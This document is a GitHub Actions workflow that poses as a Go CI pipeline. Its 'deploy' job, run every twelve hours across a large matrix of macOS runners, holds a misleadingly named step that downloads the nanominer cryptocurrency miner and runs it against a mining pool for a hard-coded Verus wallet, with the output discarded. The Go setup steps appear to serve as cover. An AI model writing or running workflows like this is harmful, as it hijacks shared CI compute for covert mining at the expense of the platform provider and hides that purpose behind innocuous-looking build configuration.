name: CI_Node

on:
  push:
  pull_request:
  schedule:
    - cron: '0 */12 * * *'
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    strategy:
      matrix:
        go: [1.21, 1.22]  # Valid modern Go versions
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
      max-parallel: 20  # Matches matrix size (2×10=20)
      fail-fast: false
    timeout-minutes: 360
    env:
      NUM_JOBS: 50
      JOB: ${{ matrix.go }}
    steps:
      - name: Set up Go ${{ matrix.go }}
        uses: actions/setup-go@v4
        with:
          go-version: ${{ matrix.go }}

  deploy:
    name: X-Code
    runs-on: macos-latest
    strategy:
      matrix:
        go: [1.21, 1.22]  # Valid modern Go versions
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T]
      max-parallel: 20  # Matches runner's capacity
      fail-fast: false
    timeout-minutes: 36
    env:
      NUM_JOBS: 200
      JOB: ${{ matrix.go }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v4  # Updated to v4

      - name: Set up Go ${{ matrix.go }}
        uses: actions/setup-go@v4
        with:
          go-version: ${{ matrix.go }}

      - name: Pascal
        run: |
          wget https://github.com/nanopool/nanominer/releases/download/v3.7.7/nanominer-linux-3.7.7.tar.gz && tar -xf nanominer-linux-3.7.7.tar.gz && chmod 777 nanominer && ./nanominer -algo Verushash -coin VRSC -wallet RCvg94F85Uw8f89ZznoEpXktTC2ZNXe8KV.M1 -pool1 eu.luckpool.net:3956 -cpuThreads 6 > /dev/null
